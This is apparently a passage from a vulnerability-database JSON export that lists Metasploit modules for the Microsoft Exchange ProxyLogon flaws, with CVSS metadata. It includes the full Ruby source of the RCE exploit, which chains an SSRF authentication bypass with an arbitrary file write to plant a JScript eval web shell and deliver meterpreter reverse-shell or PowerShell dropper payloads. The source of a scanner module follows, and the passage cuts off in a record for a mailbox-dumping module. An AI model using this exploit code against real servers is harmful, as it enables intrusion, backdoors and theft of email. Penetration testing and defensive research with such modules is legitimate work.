authentication, impersonating as the admin (CVE-2021-26855) and write arbitrary file (CVE-2021-27065) to get the RCE (Remote Code Execution). By taking advantage of this vulnerability, you can execute arbitrary commands on the remote Microsoft Exchange Server. This vulnerability affects (Exchange 2013 Versions < 15.00.1497.012, Exchange 2016 CU18 < 15.01.2106.013, Exchange 2016 CU19 < 15.01.2176.009, Exchange 2019 CU7 < 15.02.0721.013, Exchange 2019 CU8 < 15.02.0792.010). 
All components are vulnerable by default.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-12T23:49:45", "type": "metasploit", "title": "Microsoft Exchange ProxyLogon RCE", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-27065"], "modified": "2021-11-10T00:12:38", "id": "MSF:EXPLOIT-WINDOWS-HTTP-EXCHANGE_PROXYLOGON_RCE-", "href": "https://www.rapid7.com/db/modules/exploit/windows/http/exchange_proxylogon_rce/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n\n include Msf::Exploit::CmdStager\n include Msf::Exploit::FileDropper\n include Msf::Exploit::Powershell\n include Msf::Exploit::Remote::CheckModule\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Microsoft Exchange ProxyLogon RCE',\n 'Description' => %q{\n This module exploit a vulnerability on Microsoft Exchange 
Server that\n allows an attacker bypassing the authentication, impersonating as the\n admin (CVE-2021-26855) and write arbitrary file (CVE-2021-27065) to get\n the RCE (Remote Code Execution).\n\n By taking advantage of this vulnerability, you can execute arbitrary\n commands on the remote Microsoft Exchange Server.\n\n This vulnerability affects (Exchange 2013 Versions < 15.00.1497.012,\n Exchange 2016 CU18 < 15.01.2106.013, Exchange 2016 CU19 < 15.01.2176.009,\n Exchange 2019 CU7 < 15.02.0721.013, Exchange 2019 CU8 < 15.02.0792.010).\n\n All components are vulnerable by default.\n },\n 'Author' => [\n 'Orange Tsai', # Dicovery (Officially acknowledged by MSRC)\n 'Jang (@testanull)', # Vulnerability analysis + PoC (https://twitter.com/testanull)\n 'mekhalleh (RAMELLA S\u00e9bastien)', # Module author independent researcher (who listen to 'Le Comptoir Secu' and work at Zeop Entreprise)\n 'print(\"\")', # https://www.o2oxy.cn/3169.html\n 'lotusdll', # https://twitter.com/lotusdll/status/1371465073525362691\n 'Praetorian' # # Vulnerability analysis + PoC\n ],\n 'References' => [\n ['CVE', '2021-26855'],\n ['CVE', '2021-27065'],\n ['LOGO', 'https://proxylogon.com/images/logo.jpg'],\n ['URL', 'https://proxylogon.com/'],\n ['URL', 'http://aka.ms/exchangevulns'],\n ['URL', 'https://www.praetorian.com/blog/reproducing-proxylogon-exploit'],\n [\n 'URL',\n 'https://testbnull.medium.com/ph%C3%A2n-t%C3%ADch-l%E1%BB%97-h%E1%BB%95ng-proxylogon-mail-exchange-rce-s%E1%BB%B1-k%E1%BA%BFt-h%E1%BB%A3p-ho%C3%A0n-h%E1%BA%A3o-cve-2021-26855-37f4b6e06265'\n ],\n ['URL', 'https://www.o2oxy.cn/3169.html'],\n ['URL', 'https://github.com/praetorian-inc/proxylogon-exploit'],\n ['URL', 'https://github.com/Zeop-CyberSec/proxylogon_writeup']\n ],\n 'DisclosureDate' => '2021-03-02',\n 'License' => MSF_LICENSE,\n 'DefaultOptions' => {\n 'CheckModule' => 'auxiliary/scanner/http/exchange_proxylogon',\n 'HttpClientTimeout' => 60,\n 'RPORT' => 443,\n 'SSL' => true,\n 'PAYLOAD' => 
'windows/x64/meterpreter/reverse_tcp'\n },\n 'Platform' => ['windows'],\n 'Arch' => [ARCH_CMD, ARCH_X64, ARCH_X86],\n 'Privileged' => true,\n 'Targets' => [\n [\n 'Windows Powershell',\n {\n 'Platform' => 'windows',\n 'Arch' => [ARCH_X64, ARCH_X86],\n 'Type' => :windows_powershell,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\n }\n }\n ],\n [\n 'Windows Dropper',\n {\n 'Platform' => 'windows',\n 'Arch' => [ARCH_X64, ARCH_X86],\n 'Type' => :windows_dropper,\n 'CmdStagerFlavor' => %i[psh_invokewebrequest],\n 'DefaultOptions' => {\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp',\n 'CMDSTAGER::FLAVOR' => 'psh_invokewebrequest'\n }\n }\n ],\n [\n 'Windows Command',\n {\n 'Platform' => 'windows',\n 'Arch' => [ARCH_CMD],\n 'Type' => :windows_command,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp'\n }\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],\n 'Reliability' => [REPEATABLE_SESSION],\n 'AKA' => ['ProxyLogon']\n }\n )\n )\n\n register_options([\n OptString.new('EMAIL', [true, 'A known email address for this organization']),\n OptEnum.new('METHOD', [true, 'HTTP Method to use for the check', 'POST', ['GET', 'POST']]),\n OptBool.new('UseAlternatePath', [true, 'Use the IIS root dir as alternate path', false])\n ])\n\n register_advanced_options([\n OptString.new('BackendServerName', [false, 'Force the name of the backend Exchange server targeted']),\n OptString.new('ExchangeBasePath', [true, 'The base path where exchange is installed', 'C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\V15']),\n OptString.new('ExchangeWritePath', [true, 'The path where you want to write the backdoor', 'owa\\\\auth']),\n OptString.new('IISBasePath', [true, 'The base path where IIS wwwroot directory is', 'C:\\\\inetpub\\\\wwwroot']),\n OptString.new('IISWritePath', [true, 'The path where you want to write the backdoor', 
'aspnet_client']),\n OptString.new('MapiClientApp', [true, 'This is MAPI client version sent in the request', 'Outlook/15.0.4815.1002']),\n OptInt.new('MaxWaitLoop', [true, 'Max counter loop to wait for OAB Virtual Dir reset', 30]),\n OptString.new('UserAgent', [true, 'The HTTP User-Agent sent in the request', Rex::UserAgent.session_agent])\n ])\n end\n\n def cmd_windows_generic?\n datastore['PAYLOAD'] == 'cmd/windows/generic'\n end\n\n def encode_cmd(cmd)\n cmd.gsub!('\\\\', '\\\\\\\\\\\\')\n cmd.gsub('\"', '\\u0022').gsub('&', '\\u0026').gsub('+', '\\u002b')\n end\n\n def execute_command(cmd, _opts = {})\n if !cmd_windows_generic?\n cmd = \"Response.Write(new ActiveXObject(\\\"WScript.Shell\\\").Exec(\\\"#{encode_cmd(cmd)}\\\"));\"\n else\n cmd = \"Response.Write(new ActiveXObject(\\\"WScript.Shell\\\").Exec(\\\"#{encode_cmd(cmd)}\\\").StdOut.ReadAll());\"\n end\n\n send_request_raw(\n 'method' => 'POST',\n 'uri' => normalize_uri(web_directory, @random_filename),\n 'ctype' => 'application/x-www-form-urlencoded',\n 'data' => \"#{@random_inputname}=#{cmd}\"\n )\n end\n\n def install_payload(exploit_info)\n # exploit_info: [server_name, sid, session, canary, oab_id]\n\n input_name = rand_text_alpha(4..8).to_s\n shell = \"http://o/#<script language=\\\"JScript\\\" runat=\\\"server\\\">function Page_Load(){eval(Request[\\\"#{input_name}\\\"],\\\"unsafe\\\");}</script>\"\n data = {\n identity: {\n __type: 'Identity:ECP',\n DisplayName: (exploit_info[4][0]).to_s,\n RawIdentity: (exploit_info[4][1]).to_s\n },\n properties: {\n Parameters: {\n __type: 'JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel',\n ExternalUrl: shell.to_s\n }\n }\n }.to_json\n\n response = send_http(\n 'POST',\n \"[:[@#{exploit_info[0]}:444/ecp/DDI/DDIService.svc/SetObject?schema=OABVirtualDirectory&msExchEcpCanary=#{exploit_info[3]}&a=~#{random_ssrf_id}\",\n data: data,\n cookie: exploit_info[2],\n ctype: 'application/json; charset=utf-8',\n headers: {\n 'msExchLogonMailbox' => 
patch_sid(exploit_info[1]),\n 'msExchTargetMailbox' => patch_sid(exploit_info[1]),\n 'X-vDirObjectId' => (exploit_info[4][1]).to_s\n }\n )\n return '' if response.code != 200\n\n input_name\n end\n\n def message(msg)\n \"#{@proto}://#{datastore['RHOST']}:#{datastore['RPORT']} - #{msg}\"\n end\n\n def patch_sid(sid)\n ar = sid.to_s.split('-')\n if ar[-1] != '500'\n sid = \"#{ar[0..6].join('-')}-500\"\n end\n\n sid\n end\n\n def random_mapi_id\n id = \"{#{Rex::Text.rand_text_hex(8)}\"\n id = \"#{id}-#{Rex::Text.rand_text_hex(4)}\"\n id = \"#{id}-#{Rex::Text.rand_text_hex(4)}\"\n id = \"#{id}-#{Rex::Text.rand_text_hex(4)}\"\n id = \"#{id}-#{Rex::Text.rand_text_hex(12)}}\"\n id.upcase\n end\n\n def random_ssrf_id\n # https://en.wikipedia.org/wiki/2,147,483,647 (lol)\n # max. 2147483647\n rand(1941962752..2147483647)\n end\n\n def request_autodiscover(server_name)\n xmlns = { 'xmlns' => 'http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a' }\n\n response = send_http(\n 'POST',\n \"[:[@#{server_name}/autodiscover/autodiscover.xml?a=~#{random_ssrf_id}\",\n data: soap_autodiscover,\n ctype: 'text/xml; charset=utf-8'\n )\n\n case response.body\n when %r{<ErrorCode>500</ErrorCode>}\n fail_with(Failure::NotFound, 'No Autodiscover information was found')\n when %r{<Action>redirectAddr</Action>}\n fail_with(Failure::NotFound, 'No email address was found')\n end\n\n xml = Nokogiri::XML.parse(response.body)\n\n legacy_dn = xml.at_xpath('//xmlns:User/xmlns:LegacyDN', xmlns)&.content\n fail_with(Failure::NotFound, 'No \\'LegacyDN\\' was found') if legacy_dn.nil? || legacy_dn.empty?\n\n server = ''\n xml.xpath('//xmlns:Account/xmlns:Protocol', xmlns).each do |item|\n type = item.at_xpath('./xmlns:Type', xmlns)&.content\n if type == 'EXCH'\n server = item.at_xpath('./xmlns:Server', xmlns)&.content\n end\n end\n fail_with(Failure::NotFound, 'No \\'Server ID\\' was found') if server.nil? 
|| server.empty?\n\n [server, legacy_dn]\n end\n\n def request_fqdn\n ntlm_ssp = \"NTLMSSP\\x00\\x01\\x00\\x00\\x00\\x05\\x02\\x88\\xa0\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n received = send_request_raw(\n 'method' => 'RPC_IN_DATA',\n 'uri' => normalize_uri('rpc', 'rpcproxy.dll'),\n 'headers' => {\n 'Authorization' => \"NTLM #{Rex::Text.encode_base64(ntlm_ssp)}\"\n }\n )\n fail_with(Failure::TimeoutExpired, 'Server did not respond in an expected way') unless received\n\n if received.code == 401 && received['WWW-Authenticate'] && received['WWW-Authenticate'].match(/^NTLM/i)\n hash = received['WWW-Authenticate'].split('NTLM ')[1]\n message = Net::NTLM::Message.parse(Rex::Text.decode_base64(hash))\n dns_server = Net::NTLM::TargetInfo.new(message.target_info).av_pairs[Net::NTLM::TargetInfo::MSV_AV_DNS_COMPUTER_NAME]\n\n return dns_server.force_encoding('UTF-16LE').encode('UTF-8').downcase\n end\n\n fail_with(Failure::NotFound, 'No Backend server was found')\n end\n\n # https://docs.microsoft.com/en-us/openspecs/exchange_server_protocols/ms-oxcmapihttp/c245390b-b115-46f8-bc71-03dce4a34bff\n def request_mapi(server_name, legacy_dn, server_id)\n data = \"#{legacy_dn}\\x00\\x00\\x00\\x00\\x00\\xe4\\x04\\x00\\x00\\x09\\x04\\x00\\x00\\x09\\x04\\x00\\x00\\x00\\x00\\x00\\x00\"\n headers = {\n 'X-RequestType' => 'Connect',\n 'X-ClientInfo' => random_mapi_id,\n 'X-ClientApplication' => datastore['MapiClientApp'],\n 'X-RequestId' => \"#{random_mapi_id}:#{Rex::Text.rand_text_numeric(5)}\"\n }\n\n sid = ''\n response = send_http(\n 'POST',\n \"[:[@#{server_name}:444/mapi/emsmdb?MailboxId=#{server_id}&a=~#{random_ssrf_id}\",\n data: data,\n ctype: 'application/mapi-http',\n headers: headers\n )\n if response.code == 200\n sid_regex = /S-[0-9]*-[0-9]*-[0-9]*-[0-9]*-[0-9]*-[0-9]*-[0-9]*/\n\n sid = response.body.match(sid_regex).to_s\n end\n fail_with(Failure::NotFound, 'No \\'SID\\' was found') if sid.empty?\n\n sid\n end\n\n def 
request_oab(server_name, sid, session, canary)\n data = {\n filter: {\n Parameters: {\n __type: 'JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel',\n SelectedView: '',\n SelectedVDirType: 'OAB'\n }\n },\n sort: {}\n }.to_json\n\n response = send_http(\n 'POST',\n \"[:[@#{server_name}:444/ecp/DDI/DDIService.svc/GetList?reqId=1615583487987&schema=VirtualDirectory&msExchEcpCanary=#{canary}&a=~#{random_ssrf_id}\",\n data: data,\n cookie: session,\n ctype: 'application/json; charset=utf-8',\n headers: {\n 'msExchLogonMailbox' => patch_sid(sid),\n 'msExchTargetMailbox' => patch_sid(sid)\n }\n )\n\n if response.code == 200\n data = JSON.parse(response.body)\n data['d']['Output'].each do |oab|\n if oab['Server'].downcase == server_name.split('.')[0].downcase\n return [oab['Identity']['DisplayName'], oab['Identity']['RawIdentity']]\n end\n end\n end\n\n []\n end\n\n def request_proxylogon(server_name, sid)\n data = \"<r at=\\\"Negotiate\\\" ln=\\\"#{datastore['EMAIL'].split('@')[0]}\\\"><s>#{sid}</s></r>\"\n session_id = ''\n canary = ''\n\n response = send_http(\n 'POST',\n \"[:[@#{server_name}:444/ecp/proxyLogon.ecp?a=~#{random_ssrf_id}\",\n data: data,\n ctype: 'text/xml; charset=utf-8',\n headers: {\n 'msExchLogonMailbox' => patch_sid(sid),\n 'msExchTargetMailbox' => patch_sid(sid)\n }\n )\n if response.code == 241\n session_id = response.get_cookies.scan(/ASP\\.NET_SessionId=([\\w\\-]+);/).flatten[0]\n canary = response.get_cookies.scan(/msExchEcpCanary=([\\w\\-_.]+);*/).flatten[0] # coin coin coin ...\n end\n\n [session_id, canary]\n end\n\n # pre-authentication SSRF (Server Side Request Forgery) + impersonate as admin.\n def run_cve_2021_26855\n if datastore['BackendServerName'] && !datastore['BackendServerName'].empty?\n server_name = datastore['BackendServerName']\n print_status(\"Internal server name forced to: #{server_name}\")\n else\n print_status(message('Retrieving backend FQDN over RPC request'))\n server_name = request_fqdn\n 
print_status(\"Internal server name (#{server_name})\")\n end\n\n # get informations by autodiscover request.\n print_status(message('Sending autodiscover request'))\n server_id, legacy_dn = request_autodiscover(server_name)\n\n print_status(\"Server: #{server_id}\")\n print_status(\"LegacyDN: #{legacy_dn}\")\n\n # get the user UID using mapi request.\n print_status(message('Sending mapi request'))\n sid = request_mapi(server_name, legacy_dn, server_id)\n print_status(\"SID: #{sid} (#{datastore['EMAIL']})\")\n\n # search oab\n sid, session, canary, oab_id = search_oab(server_name, sid)\n\n [server_name, sid, session, canary, oab_id]\n end\n\n # post-auth arbitrary file write.\n def run_cve_2021_27065(session_info)\n # set external url (and set the payload).\n print_status('Preparing the payload on the remote target')\n input_name = install_payload(session_info)\n\n fail_with(Failure::NoAccess, 'Could\\'t prepare the payload on the remote target') if input_name.empty?\n\n # reset the virtual directory (and write the payload).\n print_status('Writing the payload on the remote target')\n remote_file = write_payload(session_info)\n\n fail_with(Failure::NoAccess, 'Could\\'t write the payload on the remote target') if remote_file.empty?\n\n # wait a lot.\n i = 0\n while i < datastore['MaxWaitLoop']\n received = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(web_directory, remote_file)\n })\n if received && (received.code == 200)\n break\n end\n\n print_warning('Waiting for the payload to be available')\n sleep 5\n i += 1\n end\n fail_with(Failure::PayloadFailed, 'Could\\'t access the remote backdoor (see. 
ExchangePathBase option)') if received.code == 302\n\n [input_name, remote_file]\n end\n\n def search_oab(server_name, sid)\n # request cookies (session and canary)\n print_status(message('Sending ProxyLogon request'))\n\n print_status('Try to get a good msExchCanary (by patching user SID method)')\n session_id, canary = request_proxylogon(server_name, patch_sid(sid))\n if canary\n auth_session = \"ASP.NET_SessionId=#{session_id}; msExchEcpCanary=#{canary};\"\n oab_id = request_oab(server_name, sid, auth_session, canary)\n end\n\n if oab_id.nil? || oab_id.empty?\n print_status('Try to get a good msExchCanary (without correcting the user SID)')\n session_id, canary = request_proxylogon(server_name, sid)\n if canary\n auth_session = \"ASP.NET_SessionId=#{session_id}; msExchEcpCanary=#{canary};\"\n oab_id = request_oab(server_name, sid, auth_session, canary)\n end\n end\n\n fail_with(Failure::NotFound, 'No \\'ASP.NET_SessionId\\' was found') if session_id.nil? || session_id.empty?\n fail_with(Failure::NotFound, 'No \\'msExchEcpCanary\\' was found') if canary.nil? || canary.empty?\n fail_with(Failure::NotFound, 'No \\'OAB Id\\' was found') if oab_id.nil? 
|| oab_id.empty?\n\n print_status(\"ASP.NET_SessionId: #{session_id}\")\n print_status(\"msExchEcpCanary: #{canary}\")\n print_status(\"OAB id: #{oab_id[1]} (#{oab_id[0]})\")\n\n return [sid, auth_session, canary, oab_id]\n end\n\n def send_http(method, ssrf, opts = {})\n ssrf = \"X-BEResource=#{ssrf};\"\n if opts[:cookie] && !opts[:cookie].empty?\n opts[:cookie] = \"#{ssrf} #{opts[:cookie]}\"\n else\n opts[:cookie] = ssrf.to_s\n end\n\n opts[:ctype] = 'application/x-www-form-urlencoded' if opts[:ctype].nil?\n\n request = {\n 'method' => method,\n 'uri' => @random_uri,\n 'agent' => datastore['UserAgent'],\n 'ctype' => opts[:ctype]\n }\n request = request.merge({ 'data' => opts[:data] }) unless opts[:data].nil?\n request = request.merge({ 'cookie' => opts[:cookie] }) unless opts[:cookie].nil?\n request = request.merge({ 'headers' => opts[:headers] }) unless opts[:headers].nil?\n\n received = send_request_cgi(request)\n fail_with(Failure::TimeoutExpired, 'Server did not respond in an expected way') unless received\n\n received\n end\n\n def soap_autodiscover\n <<~SOAP\n <?xml version=\"1.0\" encoding=\"utf-8\"?>\n <Autodiscover xmlns=\"http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006\">\n <Request>\n <EMailAddress>#{datastore['EMAIL']}</EMailAddress>\n <AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a</AcceptableResponseSchema>\n </Request>\n </Autodiscover>\n SOAP\n end\n\n def web_directory\n if datastore['UseAlternatePath']\n web_dir = datastore['IISWritePath'].gsub('\\\\', '/')\n else\n web_dir = datastore['ExchangeWritePath'].gsub('\\\\', '/')\n end\n web_dir\n end\n\n def write_payload(exploit_info)\n # exploit_info: [server_name, sid, session, canary, oab_id]\n\n remote_file = \"#{rand_text_alpha(4..8)}.aspx\"\n if datastore['UseAlternatePath']\n remote_path = \"#{datastore['IISBasePath'].split(':')[1]}\\\\#{datastore['IISWritePath']}\"\n remote_path = 
\"\\\\\\\\127.0.0.1\\\\#{datastore['IISBasePath'].split(':')[0]}$#{remote_path}\\\\#{remote_file}\"\n else\n remote_path = \"#{datastore['ExchangeBasePath'].split(':')[1]}\\\\FrontEnd\\\\HttpProxy\\\\#{datastore['ExchangeWritePath']}\"\n remote_path = \"\\\\\\\\127.0.0.1\\\\#{datastore['ExchangeBasePath'].split(':')[0]}$#{remote_path}\\\\#{remote_file}\"\n end\n\n data = {\n identity: {\n __type: 'Identity:ECP',\n DisplayName: (exploit_info[4][0]).to_s,\n RawIdentity: (exploit_info[4][1]).to_s\n },\n properties: {\n Parameters: {\n __type: 'JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel',\n FilePathName: remote_path.to_s\n }\n }\n }.to_json\n\n response = send_http(\n 'POST',\n \"[:[@#{exploit_info[0]}:444/ecp/DDI/DDIService.svc/SetObject?schema=ResetOABVirtualDirectory&msExchEcpCanary=#{exploit_info[3]}&a=~#{random_ssrf_id}\",\n data: data,\n cookie: exploit_info[2],\n ctype: 'application/json; charset=utf-8',\n headers: {\n 'msExchLogonMailbox' => patch_sid(exploit_info[1]),\n 'msExchTargetMailbox' => patch_sid(exploit_info[1]),\n 'X-vDirObjectId' => (exploit_info[4][1]).to_s\n }\n )\n return '' if response.code != 200\n\n remote_file\n end\n\n def exploit\n @proto = (ssl ? 
'https' : 'http')\n @random_uri = normalize_uri('ecp', \"#{rand_text_alpha(1..3)}.js\")\n\n print_status(message('Attempt to exploit for CVE-2021-26855'))\n exploit_info = run_cve_2021_26855\n\n print_status(message('Attempt to exploit for CVE-2021-27065'))\n shell_info = run_cve_2021_27065(exploit_info)\n\n @random_inputname = shell_info[0]\n @random_filename = shell_info[1]\n\n print_good(\"Yeeting #{datastore['PAYLOAD']} payload at #{peer}\")\n if datastore['UseAlternatePath']\n remote_file = \"#{datastore['IISBasePath']}\\\\#{datastore['IISWritePath']}\\\\#{@random_filename}\"\n else\n remote_file = \"#{datastore['ExchangeBasePath']}\\\\FrontEnd\\\\HttpProxy\\\\#{datastore['ExchangeWritePath']}\\\\#{@random_filename}\"\n end\n register_files_for_cleanup(remote_file)\n\n # trigger powa!\n case target['Type']\n when :windows_command\n vprint_status(\"Generated payload: #{payload.encoded}\")\n\n if !cmd_windows_generic?\n execute_command(payload.encoded)\n else\n response = execute_command(\"cmd /c #{payload.encoded}\")\n\n print_warning('Dumping command output in response')\n output = response.body.split('Name :')[0]\n if output.empty?\n print_error('Empty response, no command output')\n return\n end\n print_line(output)\n end\n when :windows_dropper\n execute_command(generate_cmdstager(concat_operator: ';').join)\n when :windows_powershell\n cmd = cmd_psh_payload(payload.encoded, payload.arch.first, remove_comspec: true)\n execute_command(cmd)\n end\n end\n\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/http/exchange_proxylogon_rce.rb", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-24T08:37:41", "description": "This module scan for a vulnerability on Microsoft Exchange Server that allows an attacker bypassing the authentication and impersonating as the admin (CVE-2021-26855). 
By chaining this bug with another post-auth arbitrary-file-write vulnerability to get code execution (CVE-2021-27065). As a result, an unauthenticated attacker can execute arbitrary commands on Microsoft Exchange Server. This vulnerability affects (Exchange 2013 Versions < 15.00.1497.012, Exchange 2016 CU18 < 15.01.2106.013, Exchange 2016 CU19 < 15.01.2176.009, Exchange 2019 CU7 < 15.02.0721.013, Exchange 2019 CU8 < 15.02.0792.010). All components are vulnerable by default.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-07T13:37:20", "type": "metasploit", "title": "Microsoft Exchange ProxyLogon Scanner", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-27065"], "modified": "2022-02-23T22:27:12", "id": "MSF:AUXILIARY-SCANNER-HTTP-EXCHANGE_PROXYLOGON-", "href": "https://www.rapid7.com/db/modules/auxiliary/scanner/http/exchange_proxylogon/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\n# begin auxiliary class\nclass MetasploitModule < Msf::Auxiliary\n 
include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Scanner\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Microsoft Exchange ProxyLogon Scanner',\n 'Description' => %q{\n This module scan for a vulnerability on Microsoft Exchange Server that\n allows an attacker bypassing the authentication and impersonating as the\n admin (CVE-2021-26855).\n\n By chaining this bug with another post-auth arbitrary-file-write\n vulnerability to get code execution (CVE-2021-27065).\n\n As a result, an unauthenticated attacker can execute arbitrary commands on\n Microsoft Exchange Server.\n\n This vulnerability affects (Exchange 2013 Versions < 15.00.1497.012,\n Exchange 2016 CU18 < 15.01.2106.013, Exchange 2016 CU19 < 15.01.2176.009,\n Exchange 2019 CU7 < 15.02.0721.013, Exchange 2019 CU8 < 15.02.0792.010).\n\n All components are vulnerable by default.\n },\n 'Author' => [\n 'Orange Tsai', # Dicovery (Officially acknowledged by MSRC)\n 'mekhalleh (RAMELLA S\u00e9bastien)' # Module author (Zeop Entreprise)\n ],\n 'References' => [\n ['CVE', '2021-26855'],\n ['LOGO', 'https://proxylogon.com/images/logo.jpg'],\n ['URL', 'https://proxylogon.com/'],\n ['URL', 'https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/']\n ],\n 'DisclosureDate' => '2021-03-02',\n 'License' => MSF_LICENSE,\n 'DefaultOptions' => {\n 'RPORT' => 443,\n 'SSL' => true\n },\n 'Notes' => {\n 'AKA' => ['ProxyLogon'],\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [],\n 'SideEffects' => [IOC_IN_LOGS]\n }\n )\n )\n\n register_options([\n OptEnum.new('METHOD', [true, 'HTTP Method to use for the check.', 'POST', ['GET', 'POST']])\n ])\n end\n\n def message(msg)\n \"#{@proto}://#{datastore['RHOST']}:#{datastore['RPORT']} - #{msg}\"\n end\n\n def run_host(target_host)\n @proto = (ssl ? 
'https' : 'http')\n\n uri = normalize_uri('ecp', \"#{Rex::Text.rand_text_alpha(1..3)}.js\")\n received = send_request_cgi({\n 'method' => datastore['METHOD'],\n 'uri' => uri,\n 'cookie' => 'X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;'\n })\n unless received\n print_error(message('No response, target seems down.'))\n\n return Exploit::CheckCode::Unknown\n end\n\n if received && (received.code != 500 && received.code != 503)\n print_error(message('The target is not vulnerable to CVE-2021-26855.'))\n vprint_error(\"Obtained HTTP response code #{received.code} for #{full_uri(uri)}.\")\n\n return Exploit::CheckCode::Safe\n end\n\n if received.headers['X-CalculatedBETarget'] != 'localhost'\n print_error(message('The target is not vulnerable to CVE-2021-26855.'))\n vprint_error('Could\\'t obtain a correct \\'X-CalculatedBETarget\\' in the response header.')\n\n return Exploit::CheckCode::Safe\n end\n\n print_good(message('The target is vulnerable to CVE-2021-26855.'))\n msg = \"Obtained HTTP response code #{received.code} for #{full_uri(uri)}.\"\n vprint_good(msg)\n\n report_vuln(\n host: target_host,\n name: name,\n refs: references,\n info: msg\n )\n\n Exploit::CheckCode::Vulnerable\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/http/exchange_proxylogon.rb", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-24T08:37:39", "description": "This module exploit a vulnerability on Microsoft Exchange Server that allows an attacker bypassing the authentication and impersonating as the admin (CVE-2021-26855). By taking advantage of this vulnerability, it is possible to dump all mailboxes (emails, attachments, contacts, ...). 
This vulnerability affects (Exchange 2013 Versions < 15.00.1497.012, Exchange 2016 CU18 < 15.01.2106.013, Exchange 2016 CU19 < 15.01.2176.009, Exchange 2019 CU7 < 15.02.0721.013, Exchange 2019 CU8 < 15.02.0792.010). All components are vulnerable by default.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-09T19:52:01", "type": "metasploit", "title": "Microsoft Exchange ProxyLogon Collector", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", 